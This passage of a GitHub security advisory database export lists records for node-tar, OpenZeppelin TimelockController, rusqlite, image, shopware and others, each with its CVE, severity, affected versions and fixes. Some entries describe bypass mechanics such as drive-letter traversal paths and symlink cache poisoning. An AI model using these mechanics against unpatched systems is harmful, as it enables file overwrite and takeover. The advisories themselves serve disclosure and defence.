'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'chacha20'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25005'}, {'type': 'WEB', 'url': 'https://github.com/RustCrypto/stream-ciphers/pull/64'}, {'type': 'PACKAGE', 'url': 'https://github.com/RustCrypto/stream-ciphers/tree/master/chacha20'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0029.html'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:52Z', 'nvd_published_at': None}" +1.4.0,GHSA-5955-9wpr-37jh,2021-08-31T16:02:32Z,2021-08-31T16:05:05Z,,['CVE-2021-37713'],Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization,"### Impact + +Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution + +node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain `..` path portions, and resolving the sanitized paths against the extraction target directory. + +This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as `C:some\path`. If the drive letter does not match the extraction target, for example `D:\extraction\dir`, then the result of `path.resolve(extractionDirectory, entryPath)` would resolve against the current working directory on the `C:` drive, rather than the extraction target directory. + +Additionally, a `..` portion of the path could occur immediately after the drive letter, such as `C:../foo`, and was not properly sanitized by the logic that checked for `..` within the normalized and split portions of the path. + +This only affects users of `node-tar` on Windows systems. + +### Patches + +4.4.18 || 5.0.10 || 6.1.9 + +### Workarounds + +There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does. + +Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves. + +### Fix + +The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not ""absolute"". + +Additionally, a path starting with a drive letter and then two dots, like `c:../`, would bypass the check for `..` path portions. This is checked properly in the patched versions. + +Finally, a defense in depth check is added, such that if the `entry.absolute` is outside of the extraction taret, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.18'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37713'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/52b09e309bcae0c741a7eb79a17ef36e7828b946'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/82eac952f7c10765969ed464e549375854b26edc'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/node-tar'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/tar'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T16:02:32Z', 'nvd_published_at': '2021-08-31T17:15:00Z'}" +1.4.0,GHSA-6vmq-jh76-hq43,2022-06-14T22:22:47Z,2021-08-25T20:55:25Z,,['CVE-2021-30454'],Uninitialized memory access in outer_cgi,An issue was discovered in the outer_cgi crate before 0.2.1 for Rust. A user-provided Read instance receives an uninitialized memory buffer from KeyValueReader.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'outer_cgi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30454'}, {'type': 'WEB', 'url': 'https://github.com/SolraBizna/outer_cgi/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/SolraBizna/outer_cgi/commit/dd59b3066e616a08e756f72de8dc3ab11b7036c4'}, {'type': 'PACKAGE', 'url': 'https://github.com/SolraBizna/outer_cgi'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0051.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:03:35Z', 'nvd_published_at': None}" +1.4.0,GHSA-c7fw-cr3w-wvfc,2023-06-13T16:51:44Z,2021-08-25T20:49:04Z,,['CVE-2020-35886'],"Multiple security issues including data race, buffer overflow, and uninitialized memory drop in arr","arr crate contains multiple security issues. Specifically, + +1. It incorrectly implements Sync/Send bounds, which allows to smuggle non-Sync/Send types across the thread boundary. +2. Index and IndexMut implementation does not check the array bound. +3. Array::new_from_template() drops uninitialized memory. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'arr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35886'}, {'type': 'WEB', 'url': 'https://github.com/sjep/array/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/sjep/array'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0034.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:56:00Z', 'nvd_published_at': None}" +1.4.0,GHSA-q2gj-9r85-p832,2023-06-13T20:47:12Z,2021-08-25T20:48:09Z,,['CVE-2020-35879'],Data races in rulinalg,The affected version of rulinalg has incorrect lifetime boundary definitions for RowMut::raw_slice and RowMut::raw_slice_mut. They do not conform with Rust's borrowing rule and allows the user to create multiple mutable references to the same location. This may result in unexpected calculation result and data race if both references are used at the same time.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rulinalg'}, 'ecosystem_specific': {'affected_functions': ['rulinalg::matrix::RowMut::raw_slice', 'rulinalg::matrix::RowMut::raw_slice_mut']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'last_affected': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35879'}, {'type': 'WEB', 'url': 'https://github.com/AtheMathmo/rulinalg/issues/201'}, {'type': 'PACKAGE', 'url': 'https://github.com/AtheMathmo/rulinalg'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0023.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:06:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-2c25-xfpq-8w9r,2021-07-01T21:48:01Z,2021-08-13T15:22:14Z,,['CVE-2021-33348'],Cross-site scripting in jfinal,"An issue was discovered in JFinal framework v4.9.10 and below. The ""set"" method of the ""Controller"" class of jfinal framework is not strictly filtered, which will lead to XSS vulnerabilities in some cases.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.jfinal:jfinal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.9.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33348'}, {'type': 'WEB', 'url': 'https://github.com/jfinal/jfinal/issues/188'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:28:12Z', 'nvd_published_at': '2021-06-24T15:15:00Z'}" +1.4.0,GHSA-pfrg-w49c-8432,2021-07-27T15:01:39Z,2021-08-02T17:26:23Z,,['CVE-2020-0768'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0768'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0768'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:01:39Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-vrw4-w73r-6mm8,2021-09-13T20:30:25Z,2021-08-30T16:12:49Z,,['CVE-2021-39168'],TimelockController vulnerability in OpenZeppelin Contracts,"### Impact + +A vulnerability in `TimelockController` allowed an actor with the executor role to take immediate control of the timelock, by resetting the delay to 0 and escalating privileges, thus gaining unrestricted access to assets held in the contract. Instances with the executor role set to ""open"" allow anyone to use the executor role, thus leaving the timelock at risk of being taken over by an attacker. + +### Patches + +A fix is included in the following releases of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`: +- 4.3.1 +- 3.4.2 +- 3.4.2-solc-0.7 + +Deployed instances of `TimelockController` should be replaced with a fixed version by migrating all assets, ownership, and roles. + +### Workarounds + +Revoke the executor role from accounts not strictly under the team's control. We recommend revoking all executors that are not also proposers. When applying this mitigation, ensure there is at least one proposer and executor remaining. + +### References + +[Post-mortem](https://forum.openzeppelin.com/t/timelockcontroller-vulnerability-postmortem/14958). + +### Credits + +The issue was identified by an anonymous white hat hacker through [Immunefi](https://immunefi.com/). + +### For more information + +If you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/security/advisories/GHSA-vrw4-w73r-6mm8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39168'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/commit/cec4f2ef57495d8b1742d62846da212515d99dd5'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeabl'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/CHANGELOG.md#431'}]","{'cwe_ids': ['CWE-269'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T12:57:31Z', 'nvd_published_at': '2021-08-27T00:15:00Z'}" +1.4.0,GHSA-6cj2-92m5-7mvp,2021-10-08T21:20:09Z,2021-08-03T16:48:46Z,,[],Improperly Controlled Modification of Object Prototype Attributes,"### Impact + +The software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype. + +### Patches + +`think-config@1.1.3` patched it, anyone used `think-config` should upgrade to `>=1.1.3` version. + +### References + +https://cwe.mitre.org/data/definitions/1321.html + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [thinkjs/thinkjs](https://github.com/thinkjs/thinkjs) +* Email us at [i@imnerd.org](mailto:i@imnerd.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'think-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/thinkjs/think-config/security/advisories/GHSA-6cj2-92m5-7mvp'}, {'type': 'PACKAGE', 'url': 'https://github.com/thinkjs/think-config/'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T23:23:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-r628-mhmh-qjhw,2023-03-09T16:44:57Z,2021-08-03T19:00:40Z,,['CVE-2021-32803'],Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning,"### Impact + +Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution + +`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created. + +This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur. + +By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. + +This issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2. + +### Patches + +3.2.3 || 4.4.15 || 5.0.7 || 6.1.2 + +### Workarounds + +Users may work around this vulnerability without upgrading by creating a custom `filter` method which prevents the extraction of symbolic links. + +```js +const tar = require('tar') + +tar.x({ + file: 'archive.tgz', + filter: (file, entry) => { + if (entry.type === 'SymbolicLink') { + return false + } else { + return true + } + } +}) +``` + +Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.15'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32803'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/46fe35083e2676e31c4e0a81639dce6da7aaa356'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/5987d9a41f6bfbf1ddab1098e1fdcf1a5618f571'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/85d3a942b4064e4ff171f91696fced7975167349'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/isaacs/node-tar'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1771'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/tar'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-22', 'CWE-23', 'CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-03T18:59:57Z', 'nvd_published_at': '2021-08-03T19:15:00Z'}" +1.4.0,GHSA-h6gg-fvf5-qgwf,2021-08-24T18:04:01Z,2021-08-25T20:55:41Z,2021-08-24T18:04:01Z,[],Data races in generator,"The `Generator` type is an iterable which uses a generator function that yields +values. In affected versions of the crate, the provided function yielding values +had no `Send` bounds despite the `Generator` itself implementing `Send`. + +The generator function lacking a `Send` bound means that types that are +dangerous to send across threads such as `Rc` could be sent as part of a +generator, potentially leading to data races. + +This flaw was fixed in commit [`f7d120a3b`](https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0) +by enforcing that the generator function be bound by `Send`. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/27'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/generator-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0151.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:35:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-64gv-qg2v-vxv6,2021-08-19T21:21:48Z,2021-08-25T20:45:04Z,,['CVE-2020-25793'],Array size is not checked in sized-chunks,"An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with From>.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sized-chunks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25793'}, {'type': 'WEB', 'url': 'https://github.com/bodil/sized-chunks/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodil/sized-chunks'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0041.html'}]","{'cwe_ids': ['CWE-129'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:21:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-fc38-mxwr-pfhx,2021-08-23T17:24:12Z,2021-08-23T19:43:00Z,,['CVE-2021-37710'],Cross-Site Scripting via SVG media files,"### Impact +Cross-Site Scripting via SVG media files + +### Patches +We recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-fc38-mxwr-pfhx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37710'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/abe9f69e1f667800f974acccd3047b4930e4b423'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:24:12Z', 'nvd_published_at': '2021-08-16T23:15:00Z'}" +1.4.0,GHSA-m2pf-hprp-3vqm,2023-06-13T18:18:15Z,2021-08-25T20:44:43Z,,['CVE-2019-16138'],Use after free in image,"Affected versions of this crate would call Vec::set_len on an uninitialized vector with user-provided type parameter, in an interface of the HDR image format decoder. They would then also call other code that could panic before initializing all instances. + +This could run Drop implementations on uninitialized types, equivalent to use-after-free, and allow an attacker arbitrary code execution. + +Two different fixes were applied. It is possible to conserve the interface by ensuring proper initialization before calling Vec::set_len. Drop is no longer called in case of panic, though. + +Starting from version 0.22, a breaking change to the interface requires callers to pre-allocate the output buffer and pass a mutable slice instead, avoiding all unsafe code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'image'}, 'ecosystem_specific': {'affected_functions': ['image::hdr::HDRDecoder::read_image_transform']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.2'}, {'fixed': '0.21.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16138'}, {'type': 'WEB', 'url': 'https://github.com/image-rs/image/pull/985'}, {'type': 'PACKAGE', 'url': 'https://github.com/image-rs/image'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0014.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-8h4j-vm3r-vcq3,2021-08-19T21:08:47Z,2021-08-25T20:47:48Z,,['CVE-2020-35870'],Use after free in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via an Auxdata API use-after-free.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35870'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/2ef3628dac35aeba0a97d5fb3a57746b4e1d62b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:47Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-3hj2-hh36-hv9v,2023-06-13T22:11:43Z,2021-08-25T20:51:56Z,,['CVE-2020-36220'],Data race in va-ts,"In the affected versions of this crate, Demuxer unconditionally implemented Send with no trait bounds on T. This allows sending a non-Send type T across thread boundaries, which can cause undefined behavior like unlocking a mutex from a thread that didn't lock the mutex, or memory corruption from data race. The flaw was corrected in commit `0562cbf` by adding a T: Send bound to the Send impl for Demuxer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'va-ts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36220'}, {'type': 'WEB', 'url': 'https://github.com/video-audio/va-ts/issues/4'}, {'type': 'PACKAGE', 'url': 'https://github.com/video-audio/va-ts'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0114.html'}]","{'cwe_ids': ['CWE-662', 'CWE-667', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:47:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-9r2w-394v-53qc,2021-08-31T16:01:50Z,2021-08-31T16:05:27Z,,['CVE-2021-37701'],Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links,"### Impact + +Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution + +`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. + +This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\` and `/` characters as path separators, however `\` is a valid filename character on posix systems. + +By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. + +Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. + +These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7. + +The v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below. + +### Patches + +4.4.16 || 5.0.8 || 6.1.7 + +### Workarounds + +Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links. + +```js +const tar = require('tar') + +tar.x({ + file: 'archive.tgz', + filter: (file, entry) => { + if (entry.type === 'SymbolicLink') { + return false + } else { + return true + } + } +}) +``` + +Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves. + +### Fix + +The problem is addressed in the following ways: + +1. All paths are normalized to use `/` as a path separator, replacing `\` with `/` on Windows systems, and leaving `\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed. +2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible. + +#### Caveat + +Note that this means that the `entry` objects exposed in various parts of tar's API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`. + +Users are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.","[{'type': 'CVSS_V3', 'score': 